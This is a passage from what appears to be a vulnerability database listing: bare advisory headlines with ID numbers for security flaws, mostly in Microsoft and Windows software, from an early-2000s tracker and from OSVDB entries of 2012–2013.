Stored Procedures Have Buffer Overflows That Allow Remote Users to Crash the Database Server or Execute Arbitrary Code on the Server to Gain Full Control of the System [1003756] Microsoft Internet Information Server 4.0 .HTR Web Application Lets Users Change Their Passwords When the NT Security Policy is Configured to Prohibit Password Changing [1003744] Microsoft SQL Server 'xp_dirtree' Buffer Overflow Lets Users Crash the Database Service [1003738] Norton Anti-Virus Corporate Edition Default Configuration for Windows 2000 Lets 'Power Users' Obtain Elevated 'Administrator' Privileges [1003730] Microsoft Java Virtual Machine in Internet Explorer Lets Remote Malicious Applets Redirect Web Proxy Connections [1003688] Microsoft Exchange Server 2000 Command Processing Bug Lets Remote Users Cause the SMTP Service to Crash [1003685] Microsoft Exchange Server Lets Remote Users Send or Relay Unauthorized Mail (including SPAM) Via the Server [1003660] Windows Media Player Executes URLs in Windows Media Files that Have Been Renamed as MP3 Files [1003634] Microsoft XML Core Services in SQL Server 2000 Lets Remote Scripts Access and Send Local Files [1003630] Microsoft Internet Explorer Has Another Frame Domain Security Bug That Lets Remote Users View Files or Other Personal Information from a Victim's Computer By Using Malicious VBScripts [1003629] Microsoft Commerce Server 2000 AuthFilter Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Server With LocalSystem Privileges to Gain Full Control of the Server [1003611] Gator Plugin for Microsoft Internet Explorer Lets Remote Users Install Arbitrary Software on the User's Host [1003605] Microsoft SQL Server Buffer Overflow Lets Remote Users Crash the Server and May Allow Remote Code to Be Executed on the Database Server [1003597] Microsoft Outlook Web Access Discloses 'Include' Archive Files in the 'lib' Directory to Remote Users [1003589] Windows XP Networking Port May Allow Remote Users to Deny Service By Sending a Stream of TCP SYN Packets [1003582] Microsoft Internet Security Acceleration Server Can Be Affected By Remote Users Conducting a LAND Flood Attack [1003556] Microsoft Visual C++ Compiler Buffer Security Mode Does Not Eliminate Buffer Overflows in Compiled Applications [1003546] Microsoft Outlook E-mail Client May Display Potentially Malicious File Attachments Illegally Embedded Within Mail Headers [1003540] Microsoft Internet Explorer Browser MIME Flaw Causes 'text/plain' Pages to Be Displayed as HTML and Any Embedded Scripting to Be Executed By the Browser [1003519] Microsoft Internet Explorer (IE) HTML Directive Buffer Overflow Lets Remote Users Cause Arbitrary Code to Be Executed on Another User's Computer [1003517] Microsoft Internet Explorer (IE) 'Content-Type' Processing Hole Lets Remote Users Open Applications on Another User's Computer [1003516] Microsoft Internet Explorer (IE) Web Browser Has New Frame Domain Verification Bug That Lets Remote Users Obtain Files from Another User's Local File System [1003469] Microsoft Exchange 2000 Server Allows Remote Users to View and Possibly Modify Registry Settings [1003464] PHP for Windows Discloses Path Information to Remote Users [1003462] Microsoft Internet Explorer Web Browser Allows Cross-site Scripting Attacks Via Non-HTTP Servers [1003458] Microsoft Office v. X for Mac OS X Can Be Crashed By Remote Users Sending Malformed Product Identification Packets [1003446] Microsoft Internet Information Server Can Be Stopped By Local Users Removing Virtual Directories in a Shared Hosting Environment [1003436] Windows Messenger (aka MSN Messenger) Instant Messaging Client Discloses Display Name and Contacts to Remote Users [1003434] Microsoft ASP.NET Web Application Framework Allows Cross Site Scritping Attacks and Discloses Path Information to Remote Users [1003433] BlackICE Defender Firewall for Windows Can Be Crashed By Remote Users Sending Large Ping Packets [1003429] mIRC Internet Relay Chat (IRC) Windows Client Buffer Overflow Lets Malicious IRC Servers Execute Arbitrary Code on the Client and Take Full Control of the Client's Host [1003420] Microsoft Site Server Commerce Edition Discloses Potentially Sensitive Administration Information and Source Code to Remote Users With Valid Accounts and Discloses User Passwords from the LDAP Directory to Anonymous Remote Users [1003419] Microsoft Site Server Commerce Edition Lets Remote Users With Valid NT Accounts Upload and Then Execute ASP Scripts on the Server or Consume Disk Space on the Server [1003415] Microsoft Distributed Transaction Coordinator (MSDTC) Service Can Be Crashed By Remote Users [1003382] Windows 2000 TCP Stack Bug Lets Remote Users Cause All Memory to Be Consumed on the Server [1003326] Microsoft Internet Explorer for Macintosh OS Executes Remotely Supplied Commands in AppleScripts [1003224] Microsoft Internet Information Server (IIS) Version 4 Lets Local Users Modify the Log File Undetected [1003215] Microsoft Internet Explorer Popup Object Tag Flaw Lets Remote Users Execute Programs on the Browser's Host [1003135] Microsoft Internet Explorer Can Be Crashed By Remote Users With Javascript That Calls an Endless Loop of Modeless Dialogs [1003129] AOLserver for Windows Discloses Password-Protected Files to Remote Users [1003125] Hosting Controller Windows-based Web Hosting Management Software Lets Remote Users Establish Administrator Accounts and Upload and Execute Arbitrary Code on the Server [1003109] Microsoft Internet Explorer (IE) May Allow Malicious Javascript to Poll a User's System for Known Files [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error [1003084] Microsoft Internet Explorer GetObject() Active Scripting Bug Lets Remote Code Access Files on the PC [1003075] ActivePerl for Windows Discloses Directory Path Location to Remote Users [1003050] Microsoft Internet Explorer Web Browser Can Be Crashed By Malicious Image Source Tag Javascript Supplied By Remote Users [1003049] Microsoft Internet Explorer (IE) Text Form Processing Flaw May Cause IE to Crash [1003043] PGP Plug-in For Microsoft Outlook May Fail to Encrypt E-mail in Certain Situations [1003042] Microsoft Internet Explorer Web Browser SSL Security Flaw Lets Remote Users Conduct Man-in-the-Middle Attacks to Access Sensitive Information [1003040] Microsoft Excel Password Protection Flaw Lets Local Users Obtain Contents of Password-Protect Cells [1003033] Microsoft C Runtime Format String Flaw Lets Remote Users Crash the Microsoft SQL Server Service [1003032] Microsoft SQL Server Buffer Overflow Lets Remote Users Execute Arbitrary Code in the Security Context of the SQL Server [1003024] Microsoft Internet Explorer (IE) Web Browser 'document.open()' Scripting Flaw Lets Remote Users Steal Cookies, Read Local Files, and Spoof Web Sites [1002986] Microsoft Internet Explorer Version 6 Lets Remote Scripts Access and Send Local Files [1002973] Microsoft Internet Explorer (IE 6) Browser May Automatically and Silently Execute Arbitrary Code from a Remote Web Site When the User Views a Web Page or HTML-based E-mail [1002968] Citrix ICA Client for Windows Allows Remote Malicious Code to Execute on a User's PC Without Warning [1002957] Microsoft Internet Information Server Can Be Crashed By Remote Users With HTTP Requests Containing Invalid Content-Length Values [1002942] Microsoft Internet Explorer May Execute Javascript Contained Within an 'About:' URL in an Unauthorized Security Domain When the URL Contains an Extraneous '%' Character [1002935] X Windows Temporary File Symlink Error Lets Local Users Deny Service By Overwriting Sensitive Root-Owned Files [1002919] Microsoft Internet Explorer Browser Can Be Crashed By Certain Image Tags [1002915] Microsoft Outlook Web Access for Exchange May Execute Remotely Supplied Scripts When a Recipient Views a Malicious E-mail Message [1002905] Xtel MINITEL Emulator for X Windows Has Symlink Vulnerability That Could Let Local Users Obtain Elevated Privileges [1002885] Microsoft Internet Explorer Can Be Crashed By Malicious Javascript Causing a Stack Overflow in setTimeout() Function [1002823] Microsoft Internet Explorer Fails to Enforce Cookie Prompting Preferences for Local Security Zone [1002820] Microsoft Internet Explorer Allows Malicious Web Pages to Spoof Downloadable File Types And Execute Code on the User's Computer When Opened Directly from the Browser [1002819] Microsoft Internet Explorer ActiveX Flaw Permits Remote Malicious HTML Code Containing an 'htmlfile' or 'htmlfile_FullWindowEmbed' Object to Access Local Files and Potentially Execute Commands [1002802] Microsoft Help and Support Center Software (helpctr.exe) Has Buffer Overflow That May Allow a Remote User to Cause Arbitrary Code to Be Executed on a User's PC [1002778] Microsoft Internet Information Server (IIS) Lets Remote Users Create Bogus Web Log Entries [1002775] Windows Media Player Buffer Overflow in ASF File Processing Lets Malicious Media Files Execute Arbitrary Code on a User's PC [1002772] Microsoft Internet Explorer Cookie Disclosure Fix Discloses Patch Information to Remote Users [1002733] Microsoft IIS 4.0 Configuration Error May Allow Remote Users to Obtain Physical Directory Path Information [1002728] Microsoft SQL Server May Disclose Database Passwords When Creating Data Transformation Service (DTS) Packages [1002702] Microsoft Passport May Disclose Wallet Contents, Including Credit Card and Contact Information, to Remote Users [1002693] Microsoft Internet Security and Acceleration Server UDP Fragmentation Processing Can Cause 100% of CPU Resources to Be Consumed [1002665] Compaq's DECwindows Motif Server for OpenVMS Allows Local Users to Gain Unauthorized Access to Data and System Resources [1002651] Microsoft Internet Information Server (IIS) May Disclose PHP Scripting Source Code [1002641] RSA SecurID ACE/Agent Software for Windows Can Be Forced into Debug Mode By Remote Users Without Authentication, Potentially Disclosing Information to Remote Users When Certain Programs Crash [1002626] Macintosh Cients Using Windows 2000 NTFS Volumes May Modify Directory Permissions in Certain Cases [1002595] Microsoft Internet Explorer Has Fixed Security Zone for about: URLs and Has Shared Cookie Flaw That Diminishes Cross-Site Scripting Protections [1002594] Microsoft Internet Explorer for Mac OS X is Configured to Automatically Execute Downloaded Files [1002581] Microsoft Terminal Servers Can Be Crashed By Remote Users Sending Certain Remote Desktop Protocol (RDP) Packets [1002560] Internet Explorer Sends Potentially Sensitive Web Browser Contents to Microsoft via the Network When an Error Occurs [1002559] Microsoft Office XP Sends Potentially Sensitive Information to Microsoft Via the Network When an Error Occurs [1002526] Microsoft Internet Explorer (IE) Web Browser Has Multiple URL-related Flaws That May Allow for Remote Code Execution, Remote HTTP Request Generation, and Application of Incorrect Security Restrictions [1002487] Microsoft PowerPoint Macro Security Features Can Be Bypassed by Malformed PowerPoint Documents [1002486] Microsoft Excel Macro Security Features Can Be Bypassed by Malformed Excel Documents [1002456] Microsoft Outlook Web Access Directory Validation Flaw Lets Remote Users Consume CPU Resources by Requesting Mail from Nested Folders [1002421] Microsoft Index Server Sample File Discloses File Information to Remote Users [1002413] Microsoft Outlook Express Will Execute Active Scripting in Plain Text E-mail Messages, Circumventing Some Scripting Controls [1002385] Norton Anti-Virus For Microsoft Exchange Discloses User Path Information to Remote Users [1002356] Microsoft Outlook 2000 Animated Assistant Prevents the Screen Saver from Activating, Allowing Physically Local Users to Access the System [1002331] Internet Security Systems RealSecure Intrusion Detection Misses '%u' Encoded Attacks Against Microsoft Web Servers [1002330] Cisco Catalyst 6000 Intrusion Detection System Module Fails to Detect '%u' Encoding Obfuscation Attacks Against Microsoft Web Servers [1002329] Dragon Sensor Intrusion Detection System Does Not Detect Certain Attacks Against Microsoft Web Servers [1002327] Snort Network Intrusion Detection System Will Not Detect '%u' URL Encoding Attacks Against Microsoft Web Servers [1002326] Cisco Secure Intrusion Detection System (NetRanger) Fails to Detect Certain Attacks Against Microsoft Web Servers [1002317] Microsoft DNS Server Software Susceptible to DNS Cache Poisoning in Default Configuration, Allowing Remote Users to Inject False DNS Records in Certain Situations [1002269] Microsoft Outlook Web Access with SSL Can Be Crashed by Remote Users [1002225] Windows 2000 IrDA Infrared Device Driver Lets Infrared Users Crash the System [1002212] Microsoft IIS Web Server Contains Multiple Vulnerabilities That Allow Local Users to Gain System Privileges and Allow Remote Users to Cause the Web Server to Crash [1002206] Microsoft Internet Security and Acceleration (ISA) Server 2000 Can Be Disrupted By Remote Users Due to Memory Leaks and Also Allows Cross-Site Scripting Attacks [1002183] The Matrix Screen Saver for Windows Lets Physically Local Users Bypass the Password Mechanism and Access the System [1002161] Microsoft Internet Information Server (IIS) Web Server Discloses Internal IP Addresses or NetBIOS Host Names to Remote Users [1002159] Windows Media Player ASF Marker Table Overflow Lets Remote Users Crash the Player in Certain Situations [1002134] Identix BioLogon Client for Windows Fails to Secure Screen Saver Logins in Certain Multi-monitor Configurations, Allowing Physically Local Users to Access the System Without Requiring Biometric Authentication [1002105] Microsoft SQL Database Server RPC Input Validation Failure Lets Remote Users Crash the Database Service [1002104] Microsoft Exchange Server RPC Input Validation Failure Lets Remote Users Crash the Exchange Service [1002089] SnapStream Personal Video System for Windows Lets Remote Users Obtain Files on the System, Including One Containing Unencrypted SnapStream Passwords [1002088] Windows Media Player Allows Malicious Media Files to Execute Arbitrary Code on the Player's Host [1002075] Microsoft Services for Unix Memory Leak in Telnet and NFS Services Allows Remote Users to Crash the Operating System [1002048] Windows 2000 May Disclose Descriptive Information To Local Users Attempting Password Guessing with the NetUserChangePassword API [1002028] Microsoft Exchange LDAP Service Can Be Crashed By Remote Users [1002006] Cygwin Tar File Archive Extraction Utility Lets Malicious Tar Files Write to Windows Devices When Extracted [1002005] UnZip Lets Malicious Tar Files Write to Windows Devices When Extracted [1002004] RAR File Archive Extraction Utility Lets Malicious Archives Write to Some Windows Devices on Extraction [1002003] PKZIP Lets Malicious Zip Files Write to Windows Devices When Unzipping Zip Files [1002002] WinZip Utility Lets Malicious Zip Files Write to Windows Devices on Extraction [1001984] Microsoft Outlook Allows Rogue HTML to Execute Arbitrary Commands on the User's Host [1001971] IBM DB2 Database Software for Windows Can Be Crashed By Remote Users [1001923] Microsoft's Internet Information Server's ASP Processor Can Be Crashed by Remote Users in Certain Situations [1001904] vWebServer for Windows Discloses ASP Source Code to Remote Users and Can Be Crashed Remotely [1001819] Microsoft NetMeeting Can Be Crashed By Remote Users [1001818] Microsoft Internet Information Server (IIS) Web Server Discloses ASP Source Code When Installed on FAT-based Filesystem [1001816] Microsoft Visual Studio RAD Support Component of FrontPage Lets Remote Users Execute Arbitrary Code on the FrontPage Server [1001815] Microsoft Word May Execute Macros in Malformed Word Documents Without Warning Even if Macros are Disabled [1001778] Cisco TFTP Server for Windows Discloses Any File on the System to Remote Users [1001775] Microsoft Index Server Lets Remote Users Execute Arbitrary Code With System Level Privileges, Giving Remote Users Full Control of the Operating System [1001763] Rxvt X-Windows Terminal Emulator Lets Local Users Obtain utmp Group Privileges [1001734] Microsoft SQL Server May Let Remote Authenticated Users Take Full Control of the Database Server and the Underlying Operating System [1001727] TrendMicro's InterScan VirusWall for Windows NT Allows Remote Users to Modify the Configuration Without Authentication [1001699] Microsoft Internet Explorer Web Browser May Allow Remote Users to Read Some Text Files on the Browser's Hard Drive [1001696] Microsoft Exchange Server's Outlook Web Access (OWA) Lets Remote Users Execute Arbitrary Code on the OWA User's Web Browser [1001687] Microsoft Outlook Express May Allow A Remote User to Obtain E-mail Destined for a Different User [1001673] Pragma InterAccess Telnet Server for Windows 95/98 Lets Remote Users Crash the Server [1001661] Microsoft Hotmail May Allow a Worm to Send Mail to Other Destinations Listed in a Remote User's Inbox [1001610] HyperTerminal Telnet Client for Windows Allows Local Users to Cause Arbitrary Code to be Executed by the Client [1001576] eEye Digital Security's SecureIIS Application Firewall for Microsoft Web Servers Fails to Filter Certain Web URL Characters, Allowing Remote Users to Bypass the SecureIIS Firewall [1001562] Microsoft Internet Explorer Allows Remote Web Sites to Cause a Different Web URL Address to Be Displayed in the Browser's Address Bar, Allowing Rogue Web Sites to Spoof the Browser and Masquerade as Different Web Sites [1001561] Microsoft Internet Explorer Web Browser Fails To Validate Digital Certificates in Some Configurations, Allowing Rogue Secure Web Sites to Spoof the Browser and Masquerade as a Different Secure Web Site [1001538] Older Version of Microsoft Internet Explorer Web Browser Can Be Crashed By Remote Users [1001537] Microsoft's Internet Information Server's FTP Services May Give Remote Users Information About User Account Names on the Server's Domain and Trusted Domains [1001535] Microsoft's Internet Information Server's FTP Services Can Be Crashed By Remote Users [1001530] Microsoft IIS Web Server Allows Remote Users to Execute Commands on the Server Due to CGI Decoding Error [1001525] Earlier Version of LiteServe Web Server for Windows Can Be Crashed By Remote Users [1001517] Denicomp Systems REXECD Remote Exec Server for Windows Can Be Crashed By Remote Users [1001516] Denicomp Systems RSHD Remote Shell Server for Windows Can Be Crashed By Remote Users [1001512] Microsoft Index Server for NT Can Be Crashed By Local Users, Allows Local Users to Execute Arbitrary Code With System Level Privileges, and Lets Remote Users View Certain Include Files [1001483] Microsoft IIS Web Server Lets Remote Users Restart the Web Server with Another Specially Crafted PROPFIND XML Command [1001445] Microsoft Internet Security and Acceleration Server May Allow Remote Users to Execute Arbitrary Code on the Firewall [1001424] Microsoft Internet Explorer Can Consume All Memory Due to Malicious HTML Code [1001407] WFTPD Pro FTP Server for Windows Allows Remote Users to Crash the Server [Vendor Vigorously Disputes This Claim] [1001402] Microsoft IIS Web Server Can Be Effectively Shutdown By Certain Internal-Network Attacks When The Underlying OS Supports User Account Lockouts [1001396] mIRC Internet Relay Chat Client for Windows Allows Remote Users to Control Other Users' Clients [1001380] Microsoft Internet Explorer and Outlook Express May Execute Arbitrary Code Without User Authorization or Intervention [1001344] Microsoft Internet Explorer May Not Display File Extensions in Certain Cases [1001330] Microsoft ActiveSync Software for Portable Computing Devices Allows Portable Devices to Access Files on a Locked Server [1001319] Microsoft Internet Security and Acceleration Server Can Be Crashed By Remote Users [1001311] Netscape's SmartDownload Can Automatically Execute Arbitrary Code Without User Intervention or Knowledge for Both Netscape and Microsoft Browsers [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application [1001272] PGP Encryption Software for Windows May Allow Arbitrary Files to Be Created That May Lead to Arbitrary Code Execution [1001255] Microsoft's Ping.exe Allows Local Users to Cause Certain Applications to Crash [1001221] E-Mail Clients that use Microsoft Internet Explorer to Process HTML May Disguise Executable Attachments as Data Files [1001219] Microsoft's Internet Security and Acceleration Server Performance Can Be Significantly Affected By Remote Users Under Certain Configurations [1001216] Microsoft Internet Explorer Can Be Made to Execute Arbitrary Files on the User's Computer [1001213] Tomcat Java Server for Windows Allows Remote Users to List Files Outside of the Server's Root Directory [1001211] TrendMicro's ScanMail E-Mail Virus Scanner for Microsoft Exchange Discloses Administrative System Usernames and Passwords [1001210] Microsoft Internet Explorer Allows Malicious Web Pages to Retrieve Files from the User's Computer [1001209] Microsoft Telnet Can Be Crashed Locally, Causing Other Applications Including Outlook Express To Crash [1001197] Microsoft Internet Explorer May Automatically Execute Certain E-mail Attachments [1001187] Microsoft Internet Explorer Is Vulnerable to Malicious Web Pages That May Obtain the User's Exchange E-mail Messages and May Access Restricted Web Server Directory Listings [1001172] Microsoft Visual Studio Could Allow Users to Crash the Debugger or to Execute Code on the Server [1001163] Microsoft's Dr. Watson Diagnostic Utility May Reveal Passwords and Other Sensitive Information [1001147] Microsoft Outlook Express Crashes When Reading Certain E-mail Messages [1001142] Microsoft Internet Explorer Does Not Check for Revoked Digital Certificates (Two Fraudlent Certificates Are Known to Exist) [1001139] SurfControl for Microsoft Proxy Server May Fail to Block Sites [1001123] Microsoft's FTP Server May Allow Remote Users to Deny Service on the Server [1001116] Microsoft Personal Web Server Contains An Old Internet Information Server (IIS) Vulnerability Allowing Unauthorized Directory Listings and Possible Code Execution For Remote Users [1001088] Microsoft Internet Explorer with Services for Unix 2.0 Can Create Malicious Files on the User's Host [1001087] SSH's Secure Shell for Windows 2.4 Can Be Crashed By Remote Users [1001050] Microsoft IIS 5.0 Web Server Can Be Restarted Remotely By Any User [1000989] Fastream Technologies FTP++ Server for Windows Gives Access to Files and Directories Outside the Server's Main Directory [1000988] TranSoft's Broker FTP Server for Windows Allows File and Directory Access and FTP Command Execution Outside of the Server's Root Directory [1000987] Texas Imperial Software's WFTPD Pro FTP Server for Windows NT/2000 May Execute Arbitrary Code and Can Be Crashed Remotely [1000986] SunFTP (A Windows-Based FTP Server) Allows Read and Write Access to Files and Directories Outside of the Server's Root Directory [1000945] BadBlue's Windows-Based Web Server Can Be Crashed Via the Network and May Display Full Path Names [1000940] Windows 2000's WINMM.DLL Can Locally Crash WINLOGIN.EXE OSVDB - http://www.osvdb.org: [96197] Microsoft Windows TCP/IP Stack Crafted ICMPv6 Packet Handling Remote DoS [96195] Microsoft Windows NAT Driver Crafted ICMP Packet Handling Remote Memory Corruption DoS [96194] Microsoft Windows Asynchronous RPC Request Handling Remote Code Execution [96193] Microsoft Windows Unicode Scripts Processor (USP10.DLL) Uniscribe Font Parsing Engine Unspecified Memory Corruption [96180] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3196) [96179] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3197) [96178] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3198) [95667] Microsoft Windows XP Wireless Preferred Network List (PNL) Remote Disclosure [95589] Microsoft Windows Mobile Wireless Preferred Network List (PNL) Remote Disclosure [94987] Microsoft Windows Defender Improper Pathname Handling Local Privilege Escalation [94986] Microsoft Windows Media Format Runtime Media File Handling Arbitrary Code Execution [94985] Microsoft Windows DirectShow GIF File Handling Memory Overwrite Arbitrary Code Execution [94966] Microsoft Windows win32k.sys Memory Object Dereference Handling Local Privilege Escalation [94965] Microsoft Windows win32k.sys Memory Object Allocation Handling Local Privilege Escalation [94964] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow [94963] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow DoS [94962] Microsoft Windows win32k.sys Memory Object Handling Local Information Disclosure [94961] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation [94126] Microsoft Windows Print Spooler Printer Deletion Memory Handling Local Privilege Escalation [94125] Microsoft Windows TCP/IP Driver TCP Connection Crafted Packet Handling Remote Integer Overflow DoS [94124] Microsoft Windows Kernel Page Fault System Call Handling Local Information Disclosure [93539] Microsoft Windows win32k.sys EPATHOBJ::pprFlattenRec / EPATHOBJ::bFlatten Functions Local Privilege Escalation [93320] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation [93319] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow [93318] Microsoft Windows DirectX Graphics Kernel Subsystem (dxgkrnl.sys) Memory Object Handling Local Privilege Escalation [93317] Microsoft Windows Essentials Windows Writer Crafted URL Handling Arbitrary File Overwrite [93300] Microsoft Windows HTTP Protocol Stack (HTTP.sys) Crafted HTTP Header Handling Infinite Loop Remote DoS [92133] Microsoft Windows NTFS NULL Pointer Dereference Local Privilege Escalation [92132] Microsoft Windows win32k.sys Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1292) [92131] Microsoft Windows win32k.sys Crafted Font File Handling DoS [92130] Microsoft Windows win32k.sys Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1283) [92127] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Unspecified Local Memory Corruption [92126] Microsoft Windows Multiple Active Directory Components LDAP Crafted Query Handling Memory Consumption Remote DoS [92125] Microsoft Windows Kernel Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1294) [92124] Microsoft Windows Kernel Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1284) [92122] Microsoft Windows Remote Desktop Client ActiveX (mstscax.dll) Use-after-free Arbitrary Code Execution [91696] Microsoft Windows Modern Mail Unspecified Spoofing Weakness [91269] Microsoft Windows 8 TrueType Font (TTF) Handling Unspecified DoS [91195] Microsoft Windows 7 Unspecified ASLR Protection Mechanism Bypass [91194] Microsoft Windows 7 Kernel Unspecified Local Privilege Escalation (pwn2own) [91193] Microsoft Windows 7 Unspecified ASLR / DEP Protection Mechanism Bypass (pwn2own) [91157] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1287) [91156] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1286) [91155] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1285) [90257] Microsoft Windows Server 2003 ICACLS.EXE Permission Inheritance Weakness [90236] Microsoft Windows ZwSetInformationProcess() Function Process Priority Handling Local DoS [90166] Microsoft Windows Object Linking and Embedding (OLE) Automation Memory Allocation RTF File Handling Arbitrary Code Execution [90165] Microsoft Windows Win32.sys CSRSS Memory Object Handling Local Privilege Escalation [90164] Microsoft Windows TCP/IP Stack Crafted Connection Termination Packet (TCP PIN WAIT) Handling Remote DoS [90163] Microsoft Windows Memory Object Reference Count Handling Local Privilege Escalation [90162] Microsoft Windows Memory Object Handling Local Privilege Escalation (2013-1279) [90161] Microsoft Windows ApphelpCacheLookupEntry Function Memory Object Handling Local Privilege Escalation [90160] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1277) [90159] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1276) [90158] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1275) [90157] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1274) [90156] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1273) [90155] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1272) [90154] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1271) [90153] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1270) [90152] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1269) [90151] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1268) [90150] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1267) [90149] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1266) [90148] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1265) [90147] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1264) [90146] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1263) [90145] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1262) [90144] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1261) [90143] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1260) [90142] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1259) [90141] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1258) [90140] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1257) [90139] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1256) [90138] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1255) [90137] Microsoft Windows win32k.sys SfnINOUTSTYLECHANGE Function Memory Object Handling Local Privilege Escalation [90136] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1253) [90135] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1252) [90134] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1251) [90133] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1250) [90132] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1249) [90131] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1248) [90130] Microsoft .NET Framework Windows Form Object Creation Callback Function Arbitrary Code Execution [90129] Microsoft Windows NFS Server Read-only Share File Operation Handling Remote DoS [90128] Microsoft Windows Media Content Handling Arbitrary Code Execution [89315] Microsoft Windows TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [89157] Microsoft Windows IPv6 Router Advertisement (RA) Flooding Weakness [88967] Microsoft Windows SSL/TLS Forced Downgrade MitM Weakness [88966] Microsoft Windows win32k.sys Window Broadcast Message Handling Local Privilege Escalation [88963] Microsoft .NET Framework Windows Forms (WinForms) Component System.Drawing.Imaging.EncoderParameters.ConvertToMemory() Method this.param.Length Parameter Multiple Application Handling Heap Buffer Overflow [88956] Microsoft Windows Printer Spooler Service Print Job Handling Memory Corruption [88836] Microsoft Windows Paint BMP Image Parsing Memory Corruption [88575] Microsoft Windows NT NtAcceptConnectPort Spoofed LPC Port Request Arbitrary Process Hijacking Weakness [88320] Microsoft Windows TrueType Font (TTF) Parsing Unspecified Arbitrary Code Execution [88316] Microsoft Windows OpenType Font (OTF) Parsing Unspecified Arbitrary Code Execution [88313] Microsoft Windows KERNEL32.DLL Filename Parsing Memory Corruption Privilege Escalation [88312] Microsoft Windows DirectPlay Office File Handling Heap Overflow [88051] Microsoft Windows Crafted DHCPv6 Message Remote DoS [87269] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2012-2553) [87268] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2012-2530) [87260] Microsoft Windows Briefcase Handling Underflow (2012-1527) [87259] Microsoft Windows Briefcase Handling Underflow (2012-1528) [86905] Microsoft Windows NTFS ANSI API File Name Truncation Weakness [86903] Microsoft Windows NT CSRSS Malformed Console I/O Local DoS [86866] Microsoft Windows Trusted Publisher Certificate Process Injection UAC Protection Bypass [86865] Microsoft Windows UAC Protection User-assisted Circumvention [86839] Microsoft Windows Media Player AVI File Handling Divide-by-Zero DoS [86768] Microsoft Windows Help File Viewer (winhlp32.exe) HLP File Handling Buffer Overflow [86061] Microsoft Windows Server 2008 R1 CSRSS ReadConsole / CloseHandle Local DoS [86060] Microsoft Windows Kerberos Implementation Session Handling Remote DoS [86058] Microsoft Windows Kernel Unspecified Memory Object Handling Local Overflow [85840] Microsoft Windows lpApplicationName Function Path Subversion Local Privilege Escalation [85749] Microsoft Windows win32k.sys TrueType Font File Handling Buffer Overflow [85619] Microsoft Windows Phone 7 X.509 Certificate Subject's Common Name (CN) Field Domain Name Validation Multiple Protocol SSL Server MitM Spoofing Weakness [85444] Microsoft Windows NT MSIEXEC Registry Modification Local Privilege Escalation [85442] Microsoft Windows NT Predictable LPC Message Identifier Weakness [85418] Microsoft Windows Share Service File Handle Request Saturation Remote DoS [85039] Microsoft Windows NT LPC Zone Exhaustion Local DoS [85038] Microsoft Windows Filename Extension Handling Overflow DoS [84604] Microsoft Windows JScript / VBScript Memory Object Size Calculation Website Handling Memory Corruption [84603] Microsoft Windows win32k.sys Use-after-free Local Privilege Escalation [84602] Microsoft Windows Remote Desktop Services Malformed RDP Packet Parsing Remote Code Execution [84601] Microsoft Windows Remote Administration Protocol Malformed RAP Request Parsing Remote Stack Overflow [84600] Microsoft Windows Remote Administration Protocol Malformed RAP Request Parsing Remote Heap Overflow [84599] Microsoft Windows Print Spooler Service Remote Format String [84598] Microsoft Windows netapi32.dll Remote Administration Protocol Malformed RAP Request Parsing Remote DoS [84593] Microsoft Multiple Product Windows Common Controls TabStrip ActiveX (MSCOMCTL.OCX) Document Handling Arbitrary Code Execution 